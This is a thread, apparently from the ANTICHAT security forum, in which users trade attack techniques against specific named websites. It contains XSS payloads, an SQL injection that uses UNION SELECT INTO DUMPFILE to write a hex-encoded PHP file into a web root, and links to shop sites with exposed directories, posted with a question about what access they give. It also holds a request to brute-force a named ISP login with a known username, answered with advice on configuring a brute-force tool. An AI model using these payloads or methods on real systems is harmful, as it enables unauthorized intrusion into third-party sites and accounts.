ANTICHAT — форум по информационной безопасности, OSINT и технологиям

результат
'%22%3E%3Cscript%3Ealert()%3C/script%3E
и в форме '\"\><script>alert()</script>
поставили слэши

зато я нашел php.ini в другой деректории и еще коечто как бы мне вытощить

кинь ссылку удобнее будет

Не могу если найду подобный сайт напишу

Hi,
Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on?
I tried to hex-encode the path, but no file is created then.

e.g:

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/'/var/www'/*

Works!

But

www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/0x2f7661722f777777/*

doesn work!

Is there a possibility to dump files, if magic_quotes_gpc ist switched on?

Thank you.

Вот нашел похожее
даже круче
http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/

Подскажите, что можно зделать есть маленький доступ

http://fialki.ho.com.ua/products_pictures/
вот от создателей
http://www.shop-script.ru/images/
или это не чего не дает

2Lidloses_Auge
No, this construction does not work without the quotes, hex-encoding does not help

__________________
Карфаген должен быть разрушен...

Всем привет.
Подскажите плз как настроить брутфорс доля взлома такой вот байды
http://stat.corbina.com.ua/

Известен ник и известно что пароль только цыфры. Просьба помочь-долбался ничего не выходит .

А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р